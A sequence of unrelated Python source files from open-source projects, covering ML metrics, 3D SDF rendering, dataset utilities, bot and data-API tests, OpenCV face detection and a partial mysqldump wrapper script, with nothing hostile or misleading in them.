# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Custom flag type definitions."""
import gflags
import numpy
def DEFINE_linspace(name, default, help_string,
nonempty=False,
increasing=False,
flag_values=gflags.FLAGS,
**kwargs): # pylint: disable=invalid-name
"""Defines a 'linspace' flag.
The flag value should be specified as <lower>,<upper>,<count>. The
components are used as arguments to numpy.linspace, so they must be
parsable as float, float, and int, respectively. The parsed flag
value will be a 1-dimensional numpy.ndarray.
Args:
name: Name of the flag.
default: Default value (as unparsed string), or None if flag is unset by
default.
help_string: Helpful description of the flag.
nonempty: Indicates whether the flag value is required to be nonempty. If
True, None is still an allowable default. Use gflags.MarkFlagAsRequired
to disallow None.
increasing: Indicates whether the flag value should be an increasing array.
This is only enforced if the parsed value has >=2 elements.
flag_values: The gflags.FlagValues object in which to define the flag.
**kwargs: See gflags.DEFINE.
"""
gflags.DEFINE(_LinspaceParser(), name, default, help_string,
flag_values=flag_values, **kwargs)
if nonempty:
# numpy.array can't be implicitly converted to a boolean.
# pylint: disable=g-explicit-length-test
gflags.RegisterValidator(name, lambda v: len(v) > 0,
'--%s must specify a nonempty range.' % name,
flag_values=flag_values)
if increasing:
gflags.RegisterValidator(name, lambda v: len(v) < 2 or v[-1] > v[0],
'--%s must specify an increasing range.',
flag_values=flag_values)
class _LinspaceParser(gflags.ArgumentParser):
"""Parser for 'linspace' flag type."""
def Parse(self, argument):
parts = argument.split(',')
if len(parts) != 3:
raise ValueError('Wrong number of components. Must be of the form '
'<lower>,<upper>,<count>', argument)
try:
lower, upper, count = float(parts[0]), float(parts[1]), int(parts[2])
except ValueError:
raise ValueError('Bad value. Components must be parsable as float, '
'float, and int, respectively', argument)
return numpy.linspace(lower, upper, count)
def Type(self):
return numpy.ndarray
|
deeptables/fe/__init__.py | daBawse167/deeptables | 828 | 12749758 | # -*- coding:utf-8 -*-
__author__ = 'yangjian'
|
DiffAugment-biggan-imagenet/compare_gan/metrics/fid_score.py | Rian-T/data-efficient-gans | 1,902 | 12749762 | # coding=utf-8
# Copyright 2018 Google LLC & <NAME>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of the Frechet Inception Distance.
Implemented as a wrapper around the tf.contrib.gan library. The details can be
found in "GANs Trained by a Two Time-Scale Update Rule Converge to a Local Nash
Equilibrium", Heusel et al. [https://arxiv.org/abs/1706.08500].
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import logging
from compare_gan.metrics import eval_task
import tensorflow as tf
import tensorflow_gan as tfgan
# Special value returned when FID code returned exception.
FID_CODE_FAILED = 4242.0
class FIDScoreTask(eval_task.EvalTask):
"""Evaluation task for the FID score."""
_LABEL = "fid_score"
def run_after_session(self, fake_dset, real_dset):
logging.info("Calculating FID.")
with tf.Graph().as_default():
fake_activations = tf.convert_to_tensor(fake_dset.activations)
real_activations = tf.convert_to_tensor(real_dset.activations)
fid = tfgan.eval.frechet_classifier_distance_from_activations(
real_activations=real_activations,
generated_activations=fake_activations)
with self._create_session() as sess:
fid = sess.run(fid)
logging.info("Frechet Inception Distance: %.3f.", fid)
return {self._LABEL: fid}
def compute_fid_from_activations(fake_activations, real_activations):
"""Returns the FID based on activations.
Args:
fake_activations: NumPy array with fake activations.
real_activations: NumPy array with real activations.
Returns:
A float, the Frechet Inception Distance.
"""
logging.info("Computing FID score.")
assert fake_activations.shape == real_activations.shape
with tf.Session(graph=tf.Graph()) as sess:
fake_activations = tf.convert_to_tensor(fake_activations)
real_activations = tf.convert_to_tensor(real_activations)
fid = tfgan.eval.frechet_classifier_distance_from_activations(
real_activations=real_activations,
generated_activations=fake_activations)
return sess.run(fid)
|
tests/test_platform_telegram.py | romulocollopy/bottery | 250 | 12749775 | import pytest
from bottery.message import Message
from bottery.telegram import reply
from bottery.telegram.engine import TelegramChat, TelegramEngine, TelegramUser
@pytest.fixture
def engine():
return TelegramEngine
@pytest.fixture
def user():
return TelegramUser
@pytest.fixture
def chat():
return TelegramChat
@pytest.fixture()
def message():
return Message(
id=1,
platform='telegram',
text='',
user=user,
chat=chat,
timestamp='',
raw='',
)
@pytest.fixture
def message_data():
return {
'message': {
'chat': {
'first_name': 'John',
'id': 12345678,
'last_name': 'Snow',
'type': 'private',
'username': 'johnsnow'
},
'date': 1516787847,
'from': {
'first_name': 'John',
'id': 12345678,
'is_bot': False,
'language_code': 'en-US',
'last_name': 'Snow',
'username': 'johnsnow'
},
'message_id': 2,
'text': 'Hi bot, how are you?'
},
'update_id': 987456321
}
@pytest.fixture
def edited_message_data(message_data):
return {'edited_message': message_data['message']}
@pytest.mark.parametrize('chat_type,id_expected', [
('group', 456),
('private', 123),
])
def test_platform_telegram_engine_get_chat_id(chat_type,
id_expected, engine, message):
setattr(message.chat, 'id', id_expected)
setattr(message.chat, 'type', chat_type)
setattr(message.user, 'id', id_expected)
assert engine.get_chat_id(engine, message) == id_expected
@pytest.mark.parametrize('message_input,message_key,message_edited', [
(pytest.lazy_fixture('message_data'), 'message', False),
(pytest.lazy_fixture('edited_message_data'), 'edited_message', True)
])
def test_build_message(engine, message_input, message_key, message_edited):
message = engine.build_message(engine, message_input)
assert message.id == message_input[message_key]['message_id']
assert message.text == message_input[message_key]['text']
assert message.timestamp == message_input[message_key]['date']
assert message.raw == message_input
assert message.edited == message_edited
def test_build_message_without_text(message_data, engine):
'''
Telegram can send a message without text.
For example, when a bot is added to a group.
'''
message_data_without_text = message_data
del message_data_without_text['message']['text']
message = engine.build_message(engine, message_data_without_text)
assert message.id == message_data_without_text['message']['message_id']
assert message.text is not None
assert message.text == ''
assert message.timestamp == message_data_without_text['message']['date']
assert message.raw == message_data
def test_reply_decorator(message):
@reply()
def view(message):
return ''
view(message)
assert message._request_payload['reply_to_message_id'] == message.id
def test_reply_decorator_to_previous_message(message):
@reply(to=lambda message: message.id - 2)
def view(message):
return ''
view(message)
assert message._request_payload['reply_to_message_id'] == message.id - 2
|
validation_tests/analytical_exact/transcritical_without_shock/plot_results.py | samcom12/anuga_core | 136 | 12749788 | <gh_stars>100-1000
"""
Quick plot for the outputs of transcritical flow without shock
"""
import anuga.utilities.plot_utils as util
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as pyplot
from analytical_without_shock import *
from numpy import ones
p_st = util.get_output('transcritical.sww')
p2_st=util.get_centroids(p_st)
v = p2_st.y[10]
v2=(p2_st.y==v)
h,z = analytic_sol(p2_st.x[v2])
tid = 100
#Plot the stages##############################################################
pyplot.clf()
pyplot.plot(p2_st.x[v2], p2_st.stage[tid,v2], 'b.-', label='numerical stage') # 0*T/6
pyplot.plot(p2_st.x[v2], h+z,'r-', label='analytical stage')
pyplot.plot(p2_st.x[v2], z,'k-', label='bed elevation')
pyplot.title('Stage at time %s secs'% p2_st.time[tid])
##pyplot.ylim(-5.0,5.0)
pyplot.legend(loc='best')
pyplot.xlabel('Xposition')
pyplot.ylabel('Stage')
pyplot.savefig('stage_plot.png')
#Plot the momentums##########################################################
pyplot.clf()
pyplot.plot(p2_st.x[v2], p2_st.xmom[tid,v2], 'b.-', label='numerical') # 0*T/6
pyplot.plot(p2_st.x[v2], 1.53*ones(len(p2_st.x[v2])),'r-', label='analytical')
pyplot.title('Xmomentum at time %s secs'% p2_st.time[tid])
pyplot.legend(loc='best')
pyplot.ylim([1.52,1.54])
pyplot.xlabel('Xposition')
pyplot.ylabel('Xmomentum')
pyplot.savefig('xmom_plot.png')
#Plot the velocities#########################################################
pyplot.clf()
pyplot.plot(p2_st.x[v2], p2_st.xvel[tid,v2], 'b.-', label='numerical') # 0*T/6
pyplot.plot(p2_st.x[v2], 1.53/h,'r-', label='analytical')
pyplot.title('Xvelocity at time %s secs'% p2_st.time[tid])
pyplot.legend(loc='best')
pyplot.xlabel('Xposition')
pyplot.ylabel('Xvelocity')
pyplot.savefig('xvel_plot.png')
|
main.py | pumon/untouched | 906 | 12749794 | <reponame>pumon/untouched
import argparse
import glob
import os
import time
import cv2
import imutils
from imutils.object_detection import non_max_suppression
subject_label = 1
font = cv2.FONT_HERSHEY_SIMPLEX
list_of_videos = []
cascade_path = "face_cascades/haarcascade_profileface.xml"
face_cascade = cv2.CascadeClassifier(cascade_path)
hog = cv2.HOGDescriptor()
hog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())
recognizer = cv2.face.LBPHFaceRecognizer_create()
count = 0
def detect_people(frame):
"""
detect humans using HOG descriptor
Args:
frame:
Returns:
processed frame
"""
(rects, weights) = hog.detectMultiScale(frame, winStride=(8, 8), padding=(16, 16), scale=1.06)
rects = non_max_suppression(rects, probs=None, overlapThresh=0.65)
for (x, y, w, h) in rects:
cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 0, 255), 2)
return frame
def detect_face(frame):
"""
detect human faces in image using haar-cascade
Args:
frame:
Returns:
coordinates of detected faces
"""
faces = face_cascade.detectMultiScale(frame, 1.1, 2, 0, (20, 20))
return faces
def recognize_face(frame_orginal, faces):
"""
recognize human faces using LBPH features
Args:
frame_orginal:
faces:
Returns:
label of predicted person
"""
predict_label = []
predict_conf = []
for x, y, w, h in faces:
frame_orginal_grayscale = cv2.cvtColor(frame_orginal[y: y + h, x: x + w], cv2.COLOR_BGR2GRAY)
cv2.imshow("cropped", frame_orginal_grayscale)
predict_tuple = recognizer.predict(frame_orginal_grayscale)
a, b = predict_tuple
predict_label.append(a)
predict_conf.append(b)
print("Predition label, confidence: " + str(predict_tuple))
return predict_label
def draw_faces(frame, faces):
"""
draw rectangle around detected faces
Args:
frame:
faces:
Returns:
face drawn processed frame
"""
for (x, y, w, h) in faces:
xA = x
yA = y
xB = x + w
yB = y + h
cv2.rectangle(frame, (xA, yA), (xB, yB), (0, 255, 0), 2)
return frame
def put_label_on_face(frame, faces, labels):
"""
draw label on faces
Args:
frame:
faces:
labels:
Returns:
processed frame
"""
i = 0
for x, y, w, h in faces:
cv2.putText(frame, str(labels[i]), (x, y), font, 1, (255, 255, 255), 2)
i += 1
return frame
def background_subtraction(previous_frame, frame_resized_grayscale, min_area):
"""
This function returns 1 for the frames in which the area
after subtraction with previous frame is greater than minimum area
defined.
Thus expensive computation of human detection face detection
and face recognition is not done on all the frames.
Only the frames undergoing significant amount of change (which is controlled min_area)
are processed for detection and recognition.
"""
frameDelta = cv2.absdiff(previous_frame, frame_resized_grayscale)
thresh = cv2.threshold(frameDelta, 25, 255, cv2.THRESH_BINARY)[1]
thresh = cv2.dilate(thresh, None, iterations=2)
im2, cnts, hierarchy = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
temp = 0
for c in cnts:
# if the contour is too small, ignore it
if cv2.contourArea(c) > min_area:
temp = 1
return temp
if __name__ == '__main__':
"""
main function
"""
ap = argparse.ArgumentParser()
ap.add_argument("-v", "--videos", required=True, help="path to videos directory")
args = vars(ap.parse_args())
path = args["videos"]
for f in os.listdir(path):
list_of_videos = glob.glob(os.path.join(os.path.abspath(path), f))
print(os.path.join(os.path.abspath(path), f) + "*.mp4")
print(list_of_videos)
if os.path.exists("model.yaml"):
recognizer.read("model.yaml")
for video in list_of_videos:
camera = cv2.VideoCapture(os.path.join(path, video))
grabbed, frame = camera.read()
print(frame.shape)
frame_resized = imutils.resize(frame, width=min(800, frame.shape[1]))
frame_resized_grayscale = cv2.cvtColor(frame_resized, cv2.COLOR_BGR2GRAY)
print(frame_resized.shape)
# defining min cuoff area
min_area = (3000 / 800) * frame_resized.shape[1]
while True:
starttime = time.time()
previous_frame = frame_resized_grayscale
grabbed, frame = camera.read()
if not grabbed:
break
frame_resized = imutils.resize(frame, width=min(800, frame.shape[1]))
frame_resized_grayscale = cv2.cvtColor(frame_resized, cv2.COLOR_BGR2GRAY)
temp = background_subtraction(previous_frame, frame_resized_grayscale, min_area)
if temp == 1:
frame_processed = detect_people(frame_resized)
faces = detect_face(frame_resized_grayscale)
if len(faces) > 0:
frame_processed = draw_faces(frame_processed, faces)
label = recognize_face(frame_resized, faces)
frame_processed = put_label_on_face(frame_processed, faces, label)
cv2.imshow("Detected Human and face", frame_processed)
key = cv2.waitKey(1) & 0xFF
if key == ord("q"):
break
endtime = time.time()
print("Time to process a frame: " + str(starttime - endtime))
else:
count = count + 1
print("Number of frame skipped in the video= " + str(count))
camera.release()
cv2.destroyAllWindows()
else:
print("model file not found")
list_of_videos = []
|
fixit/cli/utils.py | sk-/Fixit | 313 | 12749795 | <filename>fixit/cli/utils.py
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
def print_color(code: int, message: str) -> None:
print(f"\033[{code}m{message}\033[00m")
def print_green(message: str) -> None:
print_color(92, message)
def print_yellow(message: str) -> None:
print_color(93, message)
def print_cyan(message: str) -> None:
print_color(96, message)
def print_red(message: str) -> None:
print_color(91, message)
def snake_to_camelcase(name: str) -> str:
"""Convert snake-case string to camel-case string."""
return "".join(n.capitalize() for n in name.split("_"))
|
test/test_merged_dataset.py | alexanu/quandl-python | 1,178 | 12749822 | import unittest
from test.helpers.httpretty_extension import httpretty
import six
import datetime
import pandas
from quandl.model.dataset import Dataset
from quandl.model.data import Data
from quandl.model.merged_data_list import MergedDataList
from quandl.model.merged_dataset import MergedDataset
from mock import patch, call
from quandl.errors.quandl_error import ColumnNotFound
from test.helpers.merged_datasets_helper import setupDatasetsTest
class GetMergedDatasetTest(unittest.TestCase):
@classmethod
def setUp(self):
setupDatasetsTest(self, httpretty)
@classmethod
def tearDownClass(cls):
httpretty.disable()
httpretty.reset()
@patch('quandl.model.merged_dataset.MergedDataset._build_dataset_object')
def test_merged_dataset_calls_merged_dataset_get_dataset(self, mock):
mock.return_value = self.oil_obj
md = MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]}),
('WIKI/AAPL', {'column_index': [1]}),
('WIKI/MSFT')])
md.data_fields()
expected_calls = [
call(('NSE/OIL', {'column_index': [1, 2]})),
call(('WIKI/AAPL', {'column_index': [1]})),
call('WIKI/MSFT')
]
self.assertEqual(mock.call_count, 3)
for index, expected in enumerate(expected_calls):
self.assertEqual(mock.mock_calls[index], expected)
@patch('quandl.model.merged_dataset.MergedDataset._build_dataset_object')
def test_removes_column_index_query_param(self, mock):
self.oil_obj.requested_column_indexes = []
mock.return_value = self.oil_obj
md = MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]})], params={'column_index': 1})
md.data_fields()
expected = call(('NSE/OIL', {'column_index': [1, 2]}), params={})
self.assertEqual(mock.call_args, expected)
def test_sets_dataset_codes_for_the_datasets(self):
md = MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]}),
('WIKI/AAPL', {'column_index': [1]}),
('WIKI/MSFT')])
self.assertEqual(md._datasets, None)
six.assertCountEqual(self, [1, 2], md.dataset_codes[0][1]['column_index'])
six.assertCountEqual(self, [1], md.dataset_codes[1][1]['column_index'])
self.assertEqual('I', md.dataset_codes[2][1])
def test_sets_column_index_on_each_dataset(self):
md = MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]}),
('WIKI/AAPL', {'column_index': [1]}),
('WIKI/MSFT')])
md.data_fields()
six.assertCountEqual(self, [1, 2], md._datasets[0].requested_column_indexes)
six.assertCountEqual(self, [1], md._datasets[1].requested_column_indexes)
six.assertCountEqual(self, [], md._datasets[2].requested_column_indexes)
def test_merged_dataset_column_names(self):
md = MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]}),
('WIKI/AAPL', {'column_index': [1]}),
('WIKI/MSFT')])
expected = [six.u('Date'), six.u('NSE/OIL - column.1'),
six.u('NSE/OIL - column.2'),
six.u('WIKI/AAPL - column.1'),
six.u('WIKI/MSFT - column.1'),
six.u('WIKI/MSFT - column.2'),
six.u('WIKI/MSFT - column.3')]
six.assertCountEqual(self, md.column_names, expected)
def test_merged_dataset_oldest_available_date(self):
md = MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]}),
('WIKI/AAPL', {'column_index': [1]}),
('WIKI/MSFT')])
self.assertEqual(md.oldest_available_date, datetime.date(2013, 1, 1))
def test_merged_dataset_newest_available_date(self):
md = MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]}),
('WIKI/AAPL', {'column_index': [1]}),
('WIKI/MSFT')])
self.assertEqual(md.newest_available_date, datetime.date(2015, 7, 30))
def test_merged_dataset_database_codes(self):
md = MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]}),
('WIKI/AAPL', {'column_index': [1]}),
('WIKI/MSFT')])
six.assertCountEqual(self, md.database_code, ['NSE', 'WIKI'])
def test_merged_dataset_dataset_codes(self):
md = MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]}),
('WIKI/AAPL', {'column_index': [1]}),
('WIKI/MSFT')])
six.assertCountEqual(self,
md.dataset_code, ['OIL', 'AAPL', 'MSFT'])
def test_get_returns_merged_dataset_obj(self):
md = MergedDataset(['NSE/OIL'])
self.assertIsInstance(md, MergedDataset)
def test_raise_error_when_datasets_arg_not_list(self):
self.assertRaises(ValueError, lambda: MergedDataset('NSE/OIL').data_fields())
def test_raise_error_when_datasets_arg_list_has_invalid_type(self):
self.assertRaises(
ValueError, lambda: MergedDataset(['NSE/OIL', {'blah': [1]}]).data_fields())
def test_raise_error_when_column_index_specified_and_not_list(self):
self.assertRaises(ValueError, lambda: MergedDataset(
[('NSE/OIL', {'column_index': 'foo'})]).data_fields())
def test_raise_error_when_column_index_greater_than_max(self):
self.assertRaises(
ColumnNotFound, lambda: MergedDataset([('NSE/OIL', {'column_index': [1, 10]})]).data())
def test_raise_error_when_column_index_less_than_one(self):
self.assertRaises(
ColumnNotFound, lambda: MergedDataset([('NSE/OIL', {'column_index': [0, 1]})]).data())
@patch.object(Dataset, 'data')
def test_when_only_one_column_requested_adds_column_index_query_param(self, mock_method):
mock_method.return_value = self.data_list_obj
MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]}),
('WIKI/AAPL', {'column_index': [1]}),
('WIKI/MSFT')]).data(params={'start_date': '2015-07-01'})
expected_calls = [call(params={'start_date': '2015-07-01'}),
call(params={'column_index': 1, 'start_date': '2015-07-01'}),
call(params={'start_date': '2015-07-01'})]
self.assertEqual(mock_method.mock_calls[0], expected_calls[0])
self.assertEqual(mock_method.mock_calls[1], expected_calls[1])
self.assertEqual(mock_method.mock_calls[2], expected_calls[2])
@patch.object(Dataset, 'data')
def test_data_forwards_requests_to_datset_data(self, mock_method):
mock_method.return_value = self.data_list_obj
MergedDataset(
['NSE/OIL', 'WIKI/AAPL',
'WIKI/MSFT']).data(params={'start_date': '2015-07-01'})
self.assertEqual(mock_method.call_count, 3)
for actual in mock_method.mock_calls:
self.assertEqual(actual, call(params={'start_date': '2015-07-01'}))
def test_get_merged_dataset_data_returns_correct_types(self):
data = MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]}),
('WIKI/AAPL', {'column_index': [1]}),
('WIKI/MSFT')]).data()
self.assertIsInstance(data, MergedDataList)
self.assertIsInstance(data[0], Data)
def test_get_merged_dataset_creates_merged_pandas_dataframe(self):
data = MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]}),
('WIKI/AAPL', {'column_index': [1]}),
('WIKI/MSFT')]).data()
self.assertIsInstance(data.to_pandas(), pandas.core.frame.DataFrame)
def test_get_merged_dataset_data_returns_specified_columns(self):
data = MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]}),
('SINGLE/COLUMN', {'column_index': [1]}),
('WIKI/MSFT')]).data()
actual = data.to_pandas().columns.tolist()
expected = [six.u('NSE/OIL - column.1'),
six.u('NSE/OIL - column.2'),
six.u('SINGLE/COLUMN - column.1'),
six.u('WIKI/MSFT - column.1'),
six.u('WIKI/MSFT - column.2'),
six.u('WIKI/MSFT - column.3')]
six.assertCountEqual(self, actual, expected)
def test_get_merged_dataset_data_to_list(self):
data = MergedDataset(
[('NSE/OIL', {'column_index': [1, 2]}),
('SINGLE/COLUMN', {'column_index': [1]}),
'WIKI/MSFT']).data()
results = data.to_list()
# NSE/OIL two columns of data
# SINGLE/COLUMN one column of data
# WIKI/MSFT all 3 columns of data
expected = [[datetime.datetime(2015, 7, 11, 0, 0), 444.3, 10, 444.3, 444.3, 10, 3],
[datetime.datetime(2015, 7, 13, 0, 0), 433.3, 4, 433.3, 433.3, 4, 3],
[datetime.datetime(2015, 7, 14, 0, 0), 437.5, 3, 437.5, 437.5, 3, 3],
[datetime.datetime(2015, 7, 15, 0, 0), 440.0, 2, 440.0, 440.0, 2, 3]]
for index, expected_item in enumerate(expected):
six.assertCountEqual(self, expected_item, results[index])
def test_get_merged_dataset_data_is_descending_when_specified_in_params(self):
data = MergedDataset(['NSE/OIL', 'WIKI/AAPL',
'WIKI/MSFT']).data(params={'order': 'desc'})
results = data.to_list()
dates = list([x[0] for x in results])
self.assertTrue(all(dates[i] >= dates[i + 1]
for i in range(len(dates) - 1)))
|
s3prl/utility/data.py | hhhaaahhhaa/s3prl | 856 | 12749840 | from torch.distributed.distributed_c10d import is_initialized
from torch.utils.data import Dataset, DistributedSampler
def get_ddp_sampler(dataset: Dataset, epoch: int):
"""
This function will create a DistributedSampler if DDP is initialized,
and will just return None if DDP is not initialized.
"""
if is_initialized():
sampler = DistributedSampler(dataset)
sampler.set_epoch(epoch)
else:
sampler = None
return sampler
|
core/sdfrenderer/renderer_deepsdf.py | hyunynim/DIST-Renderer | 176 | 12749850 | <filename>core/sdfrenderer/renderer_deepsdf.py
import os, sys
import torch
import numpy as np
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
from renderer import SDFRenderer
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', '..'))
from core.utils.decoder_utils import decode_sdf, decode_sdf_gradient, decode_color
from core.visualize.profiler import Profiler
class SDFRenderer_deepsdf(SDFRenderer):
def __init__(self, decoder, intrinsic, img_hw=None, march_step=50, buffer_size=5, ray_marching_ratio=1.5, max_sample_dist=0.2, threshold=5e-5, use_gpu=True, is_eval=True):
super(SDFRenderer_deepsdf, self).__init__(decoder, intrinsic, img_hw=img_hw, march_step=march_step, buffer_size=buffer_size, ray_marching_ratio=ray_marching_ratio, max_sample_dist=max_sample_dist, threshold=threshold, use_gpu=use_gpu, is_eval=is_eval)
def get_samples(self, latent, RT, depth, normal, clamp_dist=0.1, eta=0.01, use_rand=True):
R, T = RT[:,:3], RT[:,3]
cam_pos = self.get_camera_location(R, T)
cam_rays = self.get_camera_rays(R)
depth = depth.reshape(-1)
normal = normal.reshape(-1, 3)
valid_mask = (depth < 1e5) & (depth > 0)
valid_depth, valid_normal = depth[valid_mask], normal[valid_mask, :]
valid_zdepth = valid_depth / self.calib_map[valid_mask]
points = self.generate_point_samples(cam_pos, cam_rays[:, valid_mask], valid_zdepth, has_zdepth_grad=False)
points = points.transpose(1,0)
if use_rand:
eta_map = torch.rand_like(valid_depth) * eta
else:
eta_map = torch.ones_like(valid_depth) * eta
valid_normal_inv = self.inv_transform_points(valid_normal.transpose(1,0)).transpose(1,0)
offset = valid_normal_inv * eta_map.unsqueeze(-1)
points_pos = points + offset
samples_pos = decode_sdf(self.decoder, latent, points_pos, clamp_dist=clamp_dist).squeeze(-1)
samples_pos = samples_pos - eta_map
points_neg = points - offset
samples_neg = decode_sdf(self.decoder, latent, points_neg, clamp_dist=clamp_dist).squeeze(-1)
samples_neg = samples_neg + eta_map
return samples_pos, samples_neg
def get_freespace_samples(self, latent, RT, depth, clamp_dist=0.1, number=1):
R, T = RT[:,:3], RT[:,3]
cam_pos = self.get_camera_location(R, T)
cam_rays = self.get_camera_rays(R)
depth = depth.reshape(-1)
valid_mask = (depth < 1e5) & (depth > 0)
valid_depth = depth[valid_mask]
valid_zdepth = valid_depth / self.calib_map[valid_mask]
samples = []
for idx in range(number):
ratio_sample = torch.rand_like(valid_zdepth) * 1.0
input_zdepth = valid_zdepth * ratio_sample
points = self.generate_point_samples(cam_pos, cam_rays[:, valid_mask], input_zdepth, has_zdepth_grad=False)
points = points.transpose(1,0)
sample = decode_sdf(self.decoder, latent, points, clamp_dist=clamp_dist).squeeze(-1)
samples.append(sample)
samples = torch.cat(samples, 0)
return samples
if __name__ == '__main__':
pass
|
chainercv/chainer_experimental/datasets/sliceable/getter_dataset.py | beam2d/chainercv | 1,600 | 12749884 | <reponame>beam2d/chainercv
from chainercv.chainer_experimental.datasets.sliceable.sliceable_dataset \
import _as_key_indices
from chainercv.chainer_experimental.datasets.sliceable.sliceable_dataset \
import _is_iterable
from chainercv.chainer_experimental.datasets.sliceable import SliceableDataset
class GetterDataset(SliceableDataset):
"""A sliceable dataset class that is defined with getters.
This is a dataset class with getters.
Please refer to the tutorial for more detailed explanation.
Here is an example.
>>> class SliceableLabeledImageDataset(GetterDataset):
>>> def __init__(self, pairs, root='.'):
>>> super(SliceableLabeledImageDataset, self).__init__()
>>> with open(pairs) as f:
>>> self._pairs = [l.split() for l in f]
>>> self._root = root
>>>
>>> self.add_getter('img', self.get_image)
>>> self.add_getter('label', self.get_label)
>>>
>>> def __len__(self):
>>> return len(self._pairs)
>>>
>>> def get_image(self, i):
>>> path, _ = self._pairs[i]
>>> return read_image(os.path.join(self._root, path))
>>>
>>> def get_label(self, i):
>>> _, label = self._pairs[i]
>>> return np.int32(label)
>>>
>>> dataset = SliceableLabeledImageDataset('list.txt')
>>>
>>> # get a subset with label = 0, 1, 2
>>> # no images are loaded
>>> indices = [i for i, label in
... enumerate(dataset.slice[:, 'label']) if label in {0, 1, 2}]
>>> dataset_012 = dataset.slice[indices]
"""
def __init__(self):
self._keys = []
self._getters = []
self._return_tuple = True
def __len__(self):
raise NotImplementedError
@property
def keys(self):
if self._return_tuple:
return tuple(key for key, _, _ in self._keys)
else:
return self._keys[0][0]
@keys.setter
def keys(self, keys):
self._keys = [self._keys[key_index]
for key_index in _as_key_indices(keys, self.keys)]
self._return_tuple = _is_iterable(keys)
def add_getter(self, keys, getter):
"""Register a getter function
Args:
keys (string or tuple of strings): The name(s) of data
that the getter function returns.
getter (callable): A getter function that takes an index and
returns data of the corresponding example.
"""
self._getters.append(getter)
if _is_iterable(keys):
for key_index, key in enumerate(keys):
self._keys.append((key, len(self._getters) - 1, key_index))
else:
self._keys.append((keys, len(self._getters) - 1, None))
def get_example_by_keys(self, index, key_indices):
example = []
cache = {}
for key_index in key_indices:
_, getter_index, key_index = self._keys[key_index]
if getter_index not in cache:
cache[getter_index] = self._getters[getter_index](index)
if key_index is None:
example.append(cache[getter_index])
else:
example.append(cache[getter_index][key_index])
return tuple(example)
|
recipes/Python/286223_ohmysqldump/recipe-286223.py | tdiprima/code | 2,023 | 12749967 | <filename>recipes/Python/286223_ohmysqldump/recipe-286223.py
#!/export/home/www.netuni.nl/local/bin/python
import sys, os, getopt, getpass
import MySQLdb
def ohmysqldump(db, user, passwd, excluded, options, host=''):
conn = MySQLdb.connect(host='', db=db, user=user, passwd=passwd)
c = conn.cursor()
sql = 'show tables;'
c.execute(sql)
tables = c.fetchall()
conn.close()
arguments = [db]
for table in tables:
try:
if not table[0] in excluded:
arguments.append(table[0])
except:
print "You cannot exclude non-existing tables."
sys.exit(1)
arguments.insert(0, "mysqldump")
command = 'mysqldump'
os.execvp(command, arguments)
def usage():
print """
ohmysqldump is a wrapper for mysqldump including an option to dump a
mysqldatabase EXCEPT the listed tables.
Usage: [OPTIONS] [database] [tables]
-E, exclude Exclude the tables
The -p and --password options in mysqldump has an optional argument. This
technique isn't supported (consider -p database table. Is 'database' a
password? Or is it the name of the database?). You can store the password in
an optionfile (~/.my.cnf) or ohmysqldump will ask for it (twice).
All (other) options in mysqldump are supported.
"""
#mysqldump --help follows:
#os.execvp("mysqldump", ["mysqldump", "--help"])
def main():
shortoptions = "aAB#:?cCeEFOfh:lKntdpP:qQS:Tu:vVw:Xx"
longoptions = ["all", "debug=", "character-sets-dir=", "help", "complete-insert", \
"compress", "default-character-set=", "extended-insert", "add-drop-table", \
"add-locks", "allow-keywords", "delayed-insert", "master-data", "flush-logs", \
"force", "host=", "lock-tables", "no-autocommit", "disable-keys", \
"no-create-db", "no-create-info" "no-data", "opt", "password=", "port=", \
"quick", "quote-names", "socket=", "tab=", "user=", "verbose", "version", \
"where=", "xml", "first-slave" "fields-terminated-by=", \
"fields-enclosed-by=", "fields-optionally-enclosed-by=", \
"fields-escaped-by=", "lines-terminated-by=", "all-databases", \
"databases", "tables", "exclude"]
#Try to find additional info in the mysql option-files
f = os.popen("my_print_defaults client mysqldump")
myoptions = f.readlines()
f.close
for line in myoptions:
if len(line):
# Inject it into the commandline for easy parding by getopt
# Inject it in front so any commandline-parameters will override
# the optionfile
sys.argv.insert(1,line.replace("\n",""))
try:
opts, args = getopt.getopt(sys.argv[1:], shortoptions, longoptions)
except getopt.GetoptError:
#print "error"
# print help information and exit
usage()
sys.exit(2)
if not opts and not args:
usage()
sys.exit()
options = []
runohmy = 0
askpasswd = 0
db=""
user = ""
host=""
passwd = ""
for opt, arg in opts:
# Catch some options to handle here
if opt in ["-?", "--help"]:
usage()
elif opt in ["-E", "--exclude"]:
runohmy = 1
if len(args)>1:
db = args[0]
excluded = args[1:]
# Don' pass it along
continue
else:
usage()
